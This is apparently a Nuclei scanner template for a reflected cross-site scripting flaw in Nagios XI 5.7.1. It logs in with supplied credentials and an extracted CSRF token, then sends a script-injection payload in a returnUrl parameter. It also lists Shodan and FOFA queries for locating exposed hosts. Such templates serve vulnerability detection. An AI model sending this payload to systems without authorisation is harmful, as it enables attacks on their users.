id: nagios-xi-xss info: name: Nagios XI 5.7.1 - Cross-Site Scripting author: ritikchaddha severity: medium description: | A reflected cross-site scripting (XSS) in Nagios XI 5.7.1 can result in an attacker performing malicious actions to users who open a maliciously crafted link or third-party web page. reference: - https://github.com/EmreOvunc/Nagios-XI-Reflected-XSS?tab=readme-ov-file classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-79 epss-score: 0.07062 epss-percentile: 0.94141 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: nagios product: nagios_xi shodan-query: http.favicon.hash:1460499495 fofa-query: icon_hash="1460499495" tags: nagios,nagiosxi,xss,authenticated http: - raw: - | GET /nagioslogserver/login HTTP/1.1 Host: {{Hostname}} - | POST /nagioslogserver/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_ls={{csrf}}&username={{username}}&password={{password}} - | GET /nagioslogserver/includes/components/ccm/?cmd=modify&id=1&page=1&returnUrl=%22%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&type=host HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_3 words: - '"' - '>Cancel' condition: and - type: word part: header_3 words: - text/html - type: status status: - 200 extractors: - type: regex name: csrf part: body group: 1 regex: - "name=['\"]csrf_ls['\"] value=['\"](.*)['\"](.*)>" internal: true # digest: 490a0046304402206432c11eecc1fd903eed9fb0f20c1198864c0dd1908e4f6048a5ce7500785299022017d02066bfd1478acff27608943b85040b75dc4c474e5bed2a7c45b1f09653d7:922c64590222798bb761d5b6d8e72950